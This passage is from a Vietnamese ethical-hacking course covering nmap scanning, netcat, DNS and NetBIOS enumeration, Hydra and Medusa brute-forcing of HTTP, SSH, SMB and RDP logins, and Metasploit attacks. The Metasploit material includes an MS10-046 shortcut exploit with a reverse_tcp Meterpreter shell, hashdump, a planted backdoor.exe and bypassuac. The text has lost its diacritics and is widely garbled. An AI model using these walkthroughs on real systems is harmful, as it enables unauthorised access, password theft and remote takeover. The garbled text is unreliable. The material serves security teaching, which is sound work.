Cch dng n gin nht, khng c t tham s: nmap 192.168.10.0/24

Qu trnh c thc hin nh sau:

35

a. Chuyn <target> t hostname thnh Ipv4 s dng DNS. Nu l mt a
ch IP th khng cn chuyn.
b. Thc hin ping ti host, mc nh vi mt gi tin yu cu ICMP echo v
mt g tin TCP ACK gi ti cng 80 xc nh host c ang up hay
khng? Nu khng, nmap s thot v hin thng bo. Chng ta c th s
dung Ping NULL(-PN) b qua bc ny.
c. Chuyn IP ch thnh tn vi truy vn DNS ngc. iu ny c th b
qua vi thuc tnh n ci thin tc v kh nng khng bi pht hin.
d. Thc hin qut TCP port vi hn 1000 port ph bin c lit k ti
nmap-services. Qu trnh scan SYN s c thc hin, nhng Connect
scan s c thay th khi ngi dng Unix khng phi root thiu quyn
cn thit gi cc gi tin th.

e. In kt qua ln mn hnh
Qut host ang up: nmap sP PE 192.168.10.0/24
-sP: ping scan
-PE: ping echo

36

Ph thuc vo phc tp ca mng ch v cc host, qu trnh qut c
th d dng b pht hin.Nmap cung cp kh nng lm gi a ch ngun
vi ty chn Ddecoy. N c to ra lm trn ngp ci site ch vi
nhng thng tin gi mo. Th c bn nm pha sau ty chn ny l chy
scan gi cng lc vi scan tht. H thng ch s tr li trn cc a ch
gi cng nh scan port thc ca chng ta. V quan trng hn c l a
ch gi phi cn sng. Ngc li, qu trnhscan vi SYN v dn n iu
kin t chi dch v
Nmap sSPE 192.168.10.0/24 D 10.10.10.1

37

d) Phng chng:
Tt tt c cc dch v khng cn thit. Trn Unix, chng ta c th thc hin
iu ny bng cch xem cc dch v khng cn thit trong /ect/inetd.conf v tt cc
dch vscript lc khi ng. Trn Windows, rt kh tt cc dch v khng cn thit
v theo cch hot ng ca Windows, cng TCP 139 v 445 cung cp nhiu chc nng
Windows hot ng.
3. Xc nh h iu hnh
Nhiu cng c mnh v nhiu k thut qut port c sn tm cc cng m trn
h thng ch. Nu nhn li, i tng u tin ca chng ta l qut cng xc nh
cc cng TCP v UDP trn my ch. V vi nhng thng tin , chng ta c th cng
no ang lng nghe c im yu no chng? Nhng chng ta cn tm nhiu
thng tin hn v mc tiu. chnh l xc nh h iu hnh.
a) Active OS Detection
Thng tin cng chi tit v h iu hnh th n cng hu ch trong vic phn
tch im yu. chng ta c th s dng k thut banner-grabbing, th ly thng tin t
cc dch v FTP, telnet, SMTP, HTTP. y l cch n gin nht pht hin h iu
hnh v phin bn m n ang chy. Theo , k thut ng n l k thut stack
fingerprinting. N l mt k thut rt mnh cho php chng ta bit chc h iu hnh
ch vi tin cy cao. Stack fingerprinting s yu cu ch nht mt cng ang lng
nghe. Nmap c on c trong trng hp khng c cng no ang m.

38

Active OS detection gi cc gi tin n ch xc nh im c trng chi
tit trong stack mng, iu ny cho php chng ta on h iu hnh. V phi gi cc
gi tin nh th, nn rt d dng b pht hin. v th y khng phi l cch m hacker
p dng tn cng.
Nmap vi O xc nh h iu hnh.

b) Passive OS Detection
S dng passive stack fingerprinting. N tng t nh khi nim active
stack fingerprinting. Thay v gi cc gi tin ti ch d dnh b pht hin. K tn
cng m thm gim st giao thng mng xc nh h iu hnh ang s dng. V
vy, bng vic gim st giao thng mng gia cc h thng khc nhau, chng ta c th
xc nh c h iu hnh. K thut ny ph thuc vo v tr trung tm trn mng v
trn cng cho php bt gi tin.

39

Chng 4: ENUMERATION
I. Enumeration l g?
Enumeration (Lit k) l bc tip theo trong qu trnh tm kim thng tin ca
t chc, xy ra sau khi scanning v l qu trnh tp hp v phn tch tn ngi
dng, tn ma y,ti nguyn chia s v cc dch v . N cng ch ng truy vn hoc kt
n i t i mu c tiu co c nh ng thng tin hp l hn . Enumeration (lit k) c th
c nh ngha l qu trnh trch xut nhng thng tin c c trong phn scan ra
thnh mt h thng c trt t. Nhng thng tin c trch xut bao gm nhng th c
lin quan n mc tiu cn tn cng, nh tn ngi dng (user name), tn my tnh
(host name), dch v (service), ti nguyn chia s (share).Nhng k thut lit k c
iu khin t mi trng bn trong. Enumeration bao gm c cng on kt ni n
h thng v trc tip rt trch ra cc thng tin. Mc ch ca k thut lit k l xc nh
ti khon ngi dng v ti khon h thng c kh nng s dng vo vic hack mt
mc tiu. Khng c n thi t pha i ti m m t ta i khoa n qua n tri vi c hng ta c th tng ta i
khon ny ln n mc co c quy n nh t cho phe p truy c p va o nhi u ta i khoa n
hn a c p tr c y.
II. Banner Grabbing
K thut ch yu nht ca enumeration l banner grabbing, N c th c
nh ngha n gin nh l kt ni n ng dng t xa v quan st u ra. N c nhiu
thng tin cho k tn cng t xa. t nht chng ta cng xc nh c m hnh dch
v ang chy m nhiu trng hp l to nn qu trnh nghin cu cc im yu.
Phng chng: tt cc dch v khng cn thit. chng ta c th gii hn vic truy
cp ti cc dch v iu khin truy cp mng.
III. Enumerating cc dch v mng
1. Http fingerprinting
a) Telnet
TELNET (vit tt ca TerminaL NETwork) l mt giao thc mng (network
protocol) c dng trn cc kt ni vi Internet hoc cc kt ni ti mng my tnh
cc b LAN. Ti liu ca IETF, STD 8, (cn c gi l RFC 854 v RFC 855) c ni
rng: Mc ch ca giao thc TELNET l cung cp mt phng tin truyn thng
chung chung, c tnh lng truyn, dng rng 8 bit, nh hng byte. TELNET l
mt giao thc khch-ch (client-server protocol), da trn nn TCP, v phn khch
(ngi dng) thng kt ni vo cng 23 vi mt my ch, ni cung cp chng trnh
ng dng thi hnh cc dch v.

40

S dng telnet tm hiu thng tin t cng dch v ang m, s dng cng c
t xa ly thng tin thng qua cng telnet m hu ht cc h iu hnh iu h tr.
C:\>telnet www.google.com 80

b) Netcat
L mt tool cho php ghi v c data thng qua giao thc TCP v UDP. Netcat
c th s dng nh port scanner, backdoor, port redirecter, port listener,
S dng netcat bng dng lnh:
- Ch kt ni : nc [-ty_chn] tn_my cng1[-cng2]
- Ch lng nghe: nc -l -p cng [-ty_chn] [tn_my] [cng]
V d:
Ly banner ca Server:
nc n 192.168.10.102, cng 80
Qut cng

41

chy netcat vi ty chn -z. V d scan cc cng TCP(1->500) ca host
192.168.10.102

nc v www.google.com 80
www.google.com [74.215.71.105] 80 (http) open

c) Open SSL
L s n lc hp tc nhm pht trin b m ngun m vi y tnh nng,
c trin khai trn giao thc SSL (version 2 v version 3) vgiao thc TSL(version 1)
c qun l bi cng ng nhng ngi tnhnguyn trn ton th gii s dng
Internet kt ni v pht trin bOpenSSL v cc ti liu c lin quan.
Hu ht cc phn mm nh IMAP&POP, Samba, OpenLDAP, FTP,Apache v
nhng phn mm khc u yu cu cng vic kim tra tnh xcthc ca ngi s dng
trc khi cho php s dng cc dch v ny. Nhngmc nh vic truyn ti s xc
minh thng tin ngi s dng v mt khu(password) dng vn bn thun ty nn c
th c c hoc thay i bimt ngi khc. K thut m ha nh SSL s m bo
tnh an ton v nguynvn ca d liu, vi k thut ny thng tin truyn trn mng
dng im niim c m ha. Mt khi OpenSSL c ci t trn Linux
server chng ta c th s dng n nh mt cng c th ba cho php cc ng dngkhc
dng tnh nng SSL
OpenSSL l mt b cng c mt m trin khai trn giao thc mng SSLv TLS
v cc chun mt m c lin quan. Chng trnh OpenSSL l mt cng c dng lnh

42

s dng cc chcnng mt m ca cc th vin crypto ca OpenSSL t nhn.
OpenSSL c cc th vin cung cp cc chc nng mt m cho cc ngdng nh an
ton webserver.
L phn mm m ngun m , c th s dng c cho c mc ch thng mi
v phi thng mi vi tnh nng m ho mnh trn ton th gii, h tr cc giao
thc SSLv2 v SSLv3 v TLSv1, cho c php m ho RSA v Diffie-Hellman, DSO.
H tr cho OpenSSL v RSArefUS, nng cao kh nng x l cm mt khu i vi
kho ring .Chng ch X.509 da vo xc thc cho c pha client v server, H tr
danh sch thu hi chng ch X.509, kh nng ti iu chnh i vi mi URL ca cc
tham s bt tay SSL.
2. DNS Enumeration
DNS Enumeration l qu trnh nh v tt c cc my ch DNS v tng ng
ca h h s cho mt t chc. Mt cng ty c th c c hai ni b v bn ngoi my
ch DNS c th mang li thng tin nh tn ngi dng, tn my tnh, v a ch IP ca
h thng mc tiu tim nng. Hin c rt nhiu cc cng c c th c s dng c
c thng tin cho thc hin DNS lit k. Cc v d v cc cng c c th c s
dng lit k DNS nslookup, DIN, Registry M cho s Internet (ARIN), v Whois.
k khai DNS, chng ta phi c s hiu bit v DNS v lm th no n hot ng.
Chng ta phi c kin thc v cc bn ghi DNS. Danh sch cc bn ghi DNS
cung cp mt ci nhn tng quan cc loi bn ghi ti nguyn (c s d liu h s) c
lu gi trong cc tp tin khu vc ca tn min System (DNS). DNS thc hin mt c
s d liu phn tn, phn cp, v d phng thng tin lin kt vi cc tn min Internet
v a ch. Trong nhng min my ch, cc loi h s khc nhau c s dng cho cc
mc ch khc nhau. Danh sch sau y m t bn ghi DNS ph bin cc loi v s
dng ca h:
A (a ch)-Bn mt tn my ch n mt a ch IP
SOA (Start of Authority)-Xc nh my ch DNS c trch nhim cho cc tn
min thng tin
CNAME (tn kinh in)-Cung cp tn hoc b danh cho a ch ghi
MX (th trao i) Xc nh cc my ch mail cho tn min
SRV (dch v)-Nhn dng cc dch v nh dch v th mc
PTR (pointer)-Bn a ch IP lu tr tn
NS (tn my ch)-Xc nh my ch tn khc cho tn min

43

DNS Zone Transfer thng c s dng ti to d liu DNS trn mt s
my ch DNS, hoc sao lu cc tp tin DNS. Mt ngi s dng hoc my ch s
thc hin mt yu cu chuyn giao khu vc c th t mt name server.Nu my ch
tn cho php di chuyn vng xy ra, tt c cc tn DNS v IP a ch lu tr bi cc
my ch tn s c tr li trong vn bn ASCII con ngi c th c c.
Nslookup

Ta cng c th dng lnh trc tip nh sau:
Nslookup type=any tuoitre.vn
Type l loi dch v mng, nh lit k trn: NS(nameserver), MX(mail
exchange), any(tt c).
Tuoitre.vn: mt domain

44

3. Netbios name
NetBIOS l mt t vit tt cho mng Basic Input / Output System. N cung cp
cc dch v lin quan n lp phin ca m hnh OSI cho php cc ng dng trn cc
my tnh ring giao tip qua mt mng cc b. Tht s nh mt API, NetBIOS
khng phi l mt giao thc mng. H iu hnh c hn chy NetBIOS trn IEEE
802,2 v IPX / SPX s dng tng ng giao thc Frames NetBIOS (NBF) v
NetBIOS trn IPX / SPX (NBX) . Trong cc mng hin i, NetBIOS bnh thng
chy trn giao thc TCP / IP thng qua NetBIOS qua giao thc TCP / IP (NBT) .iu
ny dn n tng my tnh trong mng c c mt tn NetBIOS v mt a ch IP tng
ng vi mt (c th khc nhau) tn my ch.
NetBIOS name l c ch t tn cho cc ti nguyn trong 1 h thng theo
khng gian phng (khng c khi nim phn cp).

45

Chng 5: PASSWORD CRACKING
I. Gii Thiu
L qu trnh tm kim hoc phc hi password vi nhiu mc ch khc nhau.
Mc ch ca vic password cracking l gip cho ngi dng c th ly li mt
khu qun trc , hoc chim ot quyn truy cp khng xc thc ti h
thng.
II. Cc K Thut Password Cracking
1. Dictionary Attacks/Hybrid Attacks
Attacks s s dng file t in c sn cha cc hash so snh vi hash
ca password tm ra dng plaint text ca password nu hash trng
nhau.
Chng ta c th thm hoc o cc t c trong t in (Hybird Attacks).
Dng ny ng dng tt khj password l nhng k t thng thng, tc
nhanh, mc thnh cng ty thuc vo t in.
2. Brute Forcing Attacks
S dng mi t hp ca tt c cc k t a vo hash v so snh. Kh nng
thnh cng l tuyt i nu c thi gian v tc crack rt lu trong trng hp
password di v phc tp. ch tt cho password ngn.
3. Syllable Attacks/Pre-Computed Hashes
Kt hp hai cch trn bng cch to sn cc bn hash ca tt c t hp cc k t
v ch so snh trong qu trnh hash. Tc crack ch mt vi pht nu c sn cc bn
hash.
III. Cc Kiu Tn Cng Thng Gp
1. Active Password Cracking

Tm 1 username co th c va do ti m password theo username o .Qu trnh
ny c th t ng ho tng tc tm kim.
Cc dng tn cng kiu Active Password Cracking:
o Password guessing: mt tp hp t in cc t v tn cng nh
mt khu v th tt c s kt hp crack cc password. Kiu tn
cng ny cn nhiu thi gian v lng bng thng mng ln; d
dng bi pht hin.
o Trojan/Spyware/Keylogger: l chng trnh chy nn gip cho k
tn cng c th ghi li bt k phm no c nhn (Keylogger);

46

thu thp thng tin mt cch b mt v c nhn, t chc (Spyware);
vi s gip ca Trojan, k tn cng c th ly quyn truy cp
vo cc password c lu tr v c th c cc ti liu c nhn,
xa file.
2. Passive Password Cracking

Capture qua trnh log -in trn ng truy n break password
offline(Sniff, MITM)
Cc kiu tn cng ny bao gm:
o Wire Sniffing: k tn cng chy cc cng c sniffing gi tin trong
mng LAN truy cp v ghi li cc giao thng mng ang sng.
D liu bt c c th s bao gm password c gi ti cc h
thng t xa thng qua cc giao dch Telnet, FTP, rlogin v mail
in t gi v nhn.
o Man-in-the-Middle (MITM) and Replay Attack: Trong tn cng
MITM, attacker ginh quyn truy cp vo knh giao tip gia nn
nhn v server tm kim thng tin; trongreplay attack, cc gi
tin v th bi (token) xc thc c bt s dng mt sniffer.
3. Offline Password Cracking
Tip xc trc tip vi my tnh nn nhn copy cc file lu tr thng tin. V
d, SAM database trn Windows (%systemroot%/system32/config) hay /root/passwd
trn Linux. Sau c th s dng John tm password dang plain text.
IV. Cc cng c Password Cracking
1. Hydra
a) Gii thiu
Hydra l mt cng c b kha ng nhp mng rt nhanh, h tr nhiu giao
thc v dch v khc nhau.
Hydra l trnh b kha ng nhp xong xong, ngha l n chy nhiu tc v
cung mt lc qu trnh b kha c nhanh hn.
Cng c ny cho php cc nh nghin cu v chuyn gia bo mt c th
trnh by mc d dng chim quyn truy cp khng xc thc t xa ti h
thng no

47

b) Cch dng
C php chung ca Hydra l:
Hydra [[-l LOGIN|-L FILE] [-p PASSWORD|-P FILE]]|[-C FILE]] [-t task] [-w
wait] [server server | IP] [service://server[:port]]

V d:

48

hydra f L login.txt P password.txt 192.168.10.1 http-get
http://192.168.10.1
Trong :
-f: finish:tm c cp username v password hp l u tin s kt thc
-L: file username (-l username)
-P: file password (-p password)
192.168.10.1: a ch ip cn b kha mt khu ng nhp
http-get: dch v http cng 80 (http c thay th bng http-get v http-
head)
http://192.168.10.1 l trang web cn cho qu trnh crack.

2. Medusa
a) Gii thiu
Medusa c th c s dng brute-force ng nhp theo tng module theo c
ch song song v nhanh chng. mc ch ca n l h tr nhiu dch v m c th
cho php qu trnh xc thc t xa nu c th.
Medusa c thit k da vo ba c im sau:
Kim tra song song da vo lung: c th kim tra trn nhiu host, username,
password.
Thit k theo module: Mi dch v tn ti dng file (.mod) c lp. Chng ta
khng cn thit chnh sa n nhn m rng danh sch cc dch v h tr for
vic brute-forcing.

49

b) Cch dng

C php:
Medusa [h host | -H file] [-u username | -U file] [-p password | -P file] [-C
file] M module [OPT]
-h host hay a ch IP, -H file cha cc host

50

-u username, -U file cha username
-p password, -P file cha password
-C file kt hp dng host, username, password dng host:username:password
-M module l bt buc theo sau l tn cc module c h tr. xem tt c
cc module ta g: medusa d v cch dng chi tit cho 1 module no : medusa M
tn_module q

51

V. Password Cracking Trn Cc Giao Thc
1. HTTP (HyperText Tranfer Protocol)
c) Khi nim
y l giao thc chuyn i siu vn bn v thng c s dng cho cc
ng dng Web (World Wide Web WWW) trn cng mc nh l 80.
d) C 2 dng m ha HTTP:
Basic access authentication: l phng php trnh duyt web hoc cc
chng trnh khc cung cp username v password when c yu cu. N h tr
tt c cc trnh duyt web, tuy nhin, c username v password c gi i dng
plain text nn t c p dng vo thc t. V qu trnh ng nhp vo router l
mt v d in hnh.

52

Chng ta c th dng Wireshark bt:

53

Nh trn hnh username v password bt c: admin:12345
Digest access authentication: l mt trong nhng phng php c tha
thun p dng cho my ch web c th vt qua cc thng tin vi
trnh duyt web ca ngi dng. N s dng hm bm(hash) m ha
cc thng tin nhy cm trc khi gi chng qua mng.
e) Crack Password HTTP
Ta c th dng nmap (Network Mapper) qut cng no ang m:

54

Truy cp vo trinh duyt kim tra th qu trnh xc thc

Khi nhn nt Cancel ta c thng bo:

55

Vo Terminal trn BackTrack 5 g: hydra f L login.txt P password.txt
192.168.10.1 http-get http://192.168.10.1
Trong :
-f: finish:tm c cp username v password hp l u tin s kt thc
-L: file username (-l username)
192.168.10.1: a ch ip cn b kha mt khu ng nhp
http-get: dch v http cng 80 (http c thay th bng http-get v http-
head)
http://192.168.10.1 l trang web cn cho qu trnh crack.

56

Hoc: medusa h 192.168.10.1 U login.txt P password M http
Trong :
-h host hay a ch ip cn b kha mt khu ng nhp.
-U: file username (-u username)
-M http giao thc cn crack. M vit tc cho modum

57

Sau quay li trinh duyt web, ta nhp username v password tm c:

58

2. SSH (Secure Shell)
a) Khi nim
SSH l mt giao thc mng cho vic giao tip d liu bo mt, cc dch v
shell t xa hoc thc thi lnh vn cc dch v mng bo mt khc gia cc my tnh
c ni mng vi nhau. N kt ni thng qua mt knh bo mt trn mt mng
khng bo mt: mt my ch v mt my khch (chy cc chng SSH server v
SSH Client).
ng dng c bit n nhiu nht ca giao thc ny l vic truy cp n
ti khon shell ca h iu hnh LIKE-UNIX (LINUX). N sinh ra thay th cc
chun giao thc khng bo mt khc nh telnet, rsh, rexec , khi m password
c gi i dng plain text, c th d dng c c.
SSH hot ng trn TCP cng 22.
b) Crack password qua SSH
Kim tra dch v ssh c ang chy hay khng?

Vi hydra: hydra f L login.txt P password.txt 192.168.10.101 ssh

59

Vi Medusa: medusa h 192.168.10.101 U login.txt P password.txt M
ssh

V y l cch truy cp vo thit b Nokia N900 t xa vi username v
password va tm c:

60

V d kim tra cc card mng t xa:

61

3. SMB (Server Message Block)
a) Khi nim
SMB c bit n nh l Common Internet File System (CIFS), hot ng
tng ng dng trong m hnh OSI, thng thng c s dng cung cp
truy cp chia s cc file, my in v cc giao tip khc nhau gia cc nt mng
trn mng. N cn cung cp k thut giao tip lin qu trnh c xc thc. Hu ht
s dng ca SMB u lin quan n Microsoft Windows.
SMB c th chy trn tng giao dch (Session) hoc thp hn:
o Trc tip trn TCP cng 445;
o Thng qua NetBIOS (cung cp nhiu dch v lin quan n tng
ng dng trong m hnh OSI cho php cc ng dng trn cc my
tnh phn bit c th giao tip vi nhau thng qua mng LAN)
trn UDP cng 137, 138 v TCP 137, 139
b) Crack password SMB
Qut xem c my no ang chy dch v smb port 445 hay khng?

62

Vi Hydra tao g: hydra f L login.txt P password.txt 192.168.10.100 smb

Vi Medusa, ta g: medusa h 192.168.10.100 U login.txt P password.txt
smbnt

63

V y l cch chng ta s dng username v password va tm c

64

4. RDP (Remote Desktop Protocol)
a) Khi nim
RDP l mt giao thc giao tip ca c nhn hay t chc c pht trin bi
Microsoft, cung cp cho ngi dng mt giao din ha i vi my tnh khc.
Hin ti, Microsoft chuyn phn mm ch (server) RDP sang Remote
Desktop Services nh Terminal Services (dch v u cui) v phn mm khch
(client) nh l Terminal Services Client.
Khi thc hin kt ni n mt my tnh no t xa, chng ta s nhn c
yu cu xc thc ngi dng v mt khu ph hp. V vy vic crack password
RDP l cn thit nu ta truy cp m cha c s chp nhn ca ngi dng.
RDP hot ng trn TCP cng 3389
b) Crack password RDP
Qut my tnh xem no c cng 3389 ang m hay khng?

65

Vi Hydra: hydra f L login.txt P password.txt 192.168.10.100 rdp t 4
w 1

Vi Medusa, n khng h tr trc tip giao thc RDP. Tuy nhin, ta c th
dng modum wrapper vi script l rdesktop. Ta thc hin nh sau:

66

Medusa M wrapper m TYPE:STDIN m PROG:rdesktop m ARGS:-u
%U p - %H h 192.168.10.100 U login.txt P password.txt
Tuy vy, chng trnh vn hot ng cha ng n lm v tn nhiu thi gian
v phi k tn cng phi nhp vo tng password mt.
y l cch dng rdesktop iu khin my tnh t xa vi username v
password tm c:

67

Chng 6: SYSTEM HACKING

I. GII THIU V METASPLOIT
1. Gii thiu
Metasploit l mt d n bo mt my tnh cung cp cc thng tin v vn l
hng bo mt cng nh gip v kim tra thm nhp v pht trin h thng pht hin
tn cng mng. Mt d n con rt ni ting ca Metasploit l Metasploit Framework.
Metasploit Framework l mt mi trng dng kim tra ,tn cng v khai
thc li ca cc service. Metasploit c xy dng t ngn ng hng i tng Perl,
vi nhng components c vit bng C, assembler, v Python.Metasploit c th chy
trn hu ht cc h iu hnh: Linux, Windows, MacOS. Chng ta c th download
chng trnh ti www.metasploit.com
Metasploit c phin bn hin ti l 4.4.
2. Cc thnh phn ca Metasploit
Metasploit h tr nhiu giao din vi ngi dng:
Console interface: dng lnh msfconsole. Msfconsole interface s dng cc
dng lnh cu hnh, kim tra nn nhanh hn v mm do hn
Web interface: dng msfweb, giao tip vi ngi dng thng qua giao din
web
Command line interface: dng msfcli
Enviroment :
Global Enviroment:c thc thi thng qua 2 cu lnh setg v unsetg,
nhng options c gn y s mang tnh ton cc, c a vo tt c
cc module exploits
Temporary Enviroment: c thc thi thng qua 2 cu lnh set v unset,
enviroment ny ch c a vo module exploit ang load hin ti, khng
nh hng n cc module exploit khc
Chng c th lu li enviroment mnh cu hnh thng qua lnh save. Mi
trng s c lu trong ./msf/config v s c load tr li khi user interface
c thc hin
3. S dng Metasploit Framework
a) Chn module exploit
La chn chng trnh, dch v li m Metasploit c h tr khai thc

68

show exploits: xem cc module exploit m framework c h tr
use exploit_name: chn module exploit
info exploit_name: xem thng tin v module exploit
Chng ta nn cp nht thng xuyn cc li dch v cng nh cc module
trn www.metasploit.com hoc qua lnh msfupdate hoc svn update
/opt/metasploit/msf3/
b) Cu hnh module exploit chn
show options: Xc nh nhng options no cn cu hnh
set : cu hnh cho nhng option ca module
Mt vi module cn c nhng advanced options, chng ta c th xem bng
cch gdng lnh show advanceds
c) Verify nhng options va cu hnh
check: kim tra xem nhng option c set chnh xc cha.
d) La chn target
La chn h diu hnh no thc hin
show targets: nhng target c cung cp bi module
set: xc nh target no
vd: msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
e) La chn payload
Payload l on code m s chy trn h thng remote machine, l mt
phn ca virus my tnh thc thi m c.
show payloads: lit k ra nhng payload ca module exploit hin ti
info payload_name: xem thng tin chi tit v payload
set payload payload_name: xc nh payload module name.Sau khi
la chn payload no, dng lnh show options xem nhng options
ca payload
show advanced: xem nhng advanced options ca payload
f) Thc thi exploit
exploit: lnh dng thc thi payload code. Payload sau s cung
cp cho chng ta nhng thng tin v h thng c khai thc
4. Gii thiu Payload Meterpreter
Meterpreter, vit tt t Meta-Interpreter l mt payload nng cao c trong
Metasploit Framework. Muc ch ca n l cung cp nhng tp lnh khai thc,

69

tn cng cc my remote computers. N c vit t cc developers di dng shared
object (DLL) files. Meterpreter v cc thnh phn m rng c thc thi trong b nh,
hon ton khng c ghi ln a nn c th trnh c s pht hin t cc phn mm
chng virus
Meterpreter cung cp mt tp lnh chng ta c th khai thc trn cc remote
computers:
Fs(Filesystem): cung cp qu trnh tng tc vi filesystem
Net: cho php xem thng tin mng ca remote machine nh IP, route
table
Process:cho php to tng tc vi cc tin trnh trn remote
machine
Sys: cho php xem thng tin h thng, mi trng ca remote
machine
a) S dng module Fs
cd directory:ging lnh cd ca commandline, chuyn th mc lm
vic
getcwd:cho bit th mc ang lm vic hin ti
ls:lit k cc th mc v tp tin
upload src1 [src2 ...] dst:upload file t src ti dst.
download src1 [src2 ...] dst:download file t src ti dst.
b) S dng module Net
ipconfig:xem cu hnh ca card mng ca my tnh t xa
route:xem bng nh tuyn ca remote machine
c) S dng module Process
execute -f file [ -a args ] [ -Hc ]:Cu lnh execute cho php to ra
mt process mi trn remote machine v s dng process khai
thc d liu
kill pid1 pid2 pid3:hu hoc tt cc process ang chy trn my
remote machine
ps:lit k nhng process ca remote machine
d) S dng module Sys
getuid: cho bit username hin ti ca remote machine
sysinfo:cho bit thng tin v my tnh nn nhn: h iu hnh, phin
bn, nn tn 32bits hay 64bits

70

5. Cch phng chng
Thng xuyn cp nht cc bn v li ca Microsofts. V d nh Metasploit
khng th khai thc c li Lsass_ms04_011, chng ta phi cp nht bn v li ca
Microsoft. Theo Microsoft nh gi, y l mt li nghim trng, c trn hu ht tt c
cc h iu hnh windows. Chng ta nn s dng hotfix c number l 835732 v li
trn.
II. Li MS10-046 (2286198)
1. Gii thiu
y l mt li rt nghim trng lin quan n Windows Shellca cho tt c cc
h iu hnh b nh hng, cho php k tn cng chim ly ton quyn iu khin
Windows v thc thi m ngun t xa. Li ny c pht hin vo thng 06/2010 v
n thng 08/2010, Microsoft tung ba bn v li.
Li nguy him ny nm trong cc tp tin "shortcut" (*.lnk) ca Windows, cc
tp tin ny thng nm giao din desktop hay trnh n Start. Bng cch to ra mt
tp tin shortcut nhng m c, tin tc c th t ng thc thi m c khi ngi dng
xem tp tin shortcut hay ni dung ca mt th mc cha tp tin shortcut nhng m
c.
Cc bn Windows b nh hng bao gm.

71

2. Cc bc tn cng:
Saukhi khi ng BackTrack v ang nhp thnh cng, ta khi ng
Terminal ta c:

Ta g tip: msfconsole v enter:
H iu Hnh
Windows XP Service Pack 3
Windows Server 2008 for 32-bit Systems
and Windows Server 2008 for 32-bit
Systems Service Pack 2*
Windows XP Professional x64 Edition
Service Pack 2
Windows Server 2008 for x64-based
Systems and Windows Server 2008 for
x64-based Systems Service Pack 2*
Windows Server 2003 Service Pack 2
Windows Server 2008 for Itanium-based
Systems and Windows Server 2008 for
Itanium-based Systems Service Pack 2
Windows Server 2003 x64 Edition Service
Pack 2 Windows 7 for 32-bit Systems
Windows Server 2003 with SP2 for
Itanium-based Systems Windows 7 for x64-based Systems
Windows Vista Service Pack 1 and
Windows Vista Service Pack 2
Windows Server 2008 R2 for x64-based
Systems*
Windows Vista x64 Edition Service Pack 1
and Windows Vista x64 Edition Service
Pack 2
Windows Server 2008 R2 for Itanium-
based Systems

72

dng m li ms10-046: search ms10-046 v enter

Ta g tip:
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader v
enter

73

Dng lnh: show options xem cc tham s cn thit c th tin
hnh tn cng c:
o SRVHOST: a ch my ca k tn cng, lng nghe c nn
nhn no kt ni n hay khng
o SRVPORT: cng lng nghe, mc nh l http (80)

74

Ta s:
o set PAYLOADwindows/meterpreter/reverse_tcp
o set SRVHOST 192.168.1.200
o set lhost a ch IP: set LHOST 192.168.1.200. LHOST l
tham s ca PAYLOAD m ta va set trn.

exploit khi ng server lng nghe trn my tnh tn cng

75

Trn my tnh nn nhn, to 1 shortcut bng cch nhn phi chut vo
Desktop -> New -> Shortcut

76

Ta g vo a ch ca my tn cng vo Type the location of the item:
http://192.168.1.200/anythingv chn Next

t tn cho shortcut va mi to v nhn Finish. Ta s m shortcut ny:

77

i mt lt, trn my tnh tn cng ta c:

Dng lnh sessions xem cc phin lm vic m Metasploit ang c:

78

tng tc vi 1 session no ta thc hin: sessions i 1 (1 l id ca
sessions)

V by gi th mi vic tr nn d dng hn, khi k tn cng iu khin
c my nn nhn vi ton quyn. V d:
Lnh sysinfo ly thng tin ca my nn nhn:
Lnh hashdump ly mt khu ca ngi dng di dng hash

79

Lnh rt hu ch s dng cmd (command-line): shell

3. Cch phng chng
Thng xuyn cp nht cc bn v li ca Windows trch b hacker li
dng.

80

Bn v li c tn m l KB2286198 cha ng phin bn mi ca tp tin
Shell32.dll, y l phn cp nht quan trng. Shell32.dll l mt tp tin th vin rt
quan trng trong Windows, n cha ng mt s hm Windows Shell API. Nu
Shell32.dll b li hay cp nht li, my tnh s c tnh trng "Mn hnh xanh cht chc"
hay Blue Screen.
III. Li BYPASSUAC
1. Gii thiu
T Windows Vista tr v sau, Microsoft gii thiu mt tin ch c xy
dng sn l User Access Control (UAC). UAC lm tng tnh bo mt ca Windows
bng cch gii hn cc phn mm ng dng ca nhm quyn ngi s dng c bn.
V vy, ch nhng phn mm c ngi dng tin tng mi nhn c quyn qun
tr, nhng phn mm khc th khng. Tuy nhin, vi ti khon ca ngi qun tr, cc
ng dng vn b gii hn nh nhng ti khon thng khc.
Cc h iu hnh c tch hp sn User Access Control iu b nh hng v c
th khai thc.
2. Cc bc tn cng
Vo Terminal, g msfconsole v Enter:

use exploit/multi/handler. y l mt modume cung cp nhiu chc
nng ca h thng payload Metasploit cho chng ta khai thc bng cch

81

thc hin: run post/windows/escalate/bypassuac nh l v d trong
trng hp ny v cn nhiu th khc na.
set PAYLOAD windows/meterpreter/reverse_tcp: cho php kt ni
li vi my tnh tn cng d dng iu khin.
set LHOST 192.168.1.202: host lng nghe, a ch IP ca my tn cng
set LPORT 6789:port lng nghe, ty min l cha c s dng.

exploit bt u khi ng server.

82

Ta s to ra mt con backdoor cho php kt ni n server m chng ta
khi ng sn trc .

83

Sau khi to xong, ta copy file backdoor.exe n my tnh nn nhn v
thc thi. Chng ta c th s dng Samba chia s file gia Windows v
Linux.
Trn my tnh Windows, ta s share file vi ton quyn truy cp:

84

Tr li my tnh nn nhn, v thc thi file backdoor.exe va copy. Khi
trn my tnh nn nhn chng ta s nhn c nh sau:

Ta c 1 phin lm vic vn cha iu khin ton quyn c. thc hin
ta cn thc hin lnh: run post/windows/escalate/bypassuac

85

Chng ta c th xem tt c cc lnh h tr bng lnh: help

3. Cch phng chng
Rt tic l cho n thi im hin ti, Microsoft vn cha xc nhn li trong
UAC cng nh cung cp bn v cho l hng bo mt ny. Mt pht ngn vin ca
Microsoft khng nh khng c l hng vo trong UAC c. V th, chng ta cn ci t
phn mm dit virus, backdoor c uy tnh trn th trng trnh b li dng.

86

Chng 7: WEB HACKING VI DVWA
I. Gii thiu
i vi nhng chng ta mi nghin cu hacking, mi trng th nghim l rt
quan trng, tuy nhin tm c mi trng thc t, ph hp vi trnh li khng n
gin.
Ngc li, i vi nhng ngi c trnh v kinh nghim hacking, chc hn
cc chng ta cng c nhu cu th nghim trnh hacking ca mnh n u cng nh
nng cao thm kh nng bn thn.
Vy th DVWA- Damn Vulnerable Web Application c th p ng nhu cu
ca c nhng ngi mi vo cng nh nhng ngi c trnh nht nh. DVWA
l mt framework xy dng sn nhng l hng bo mt theo top 10 im yu bo
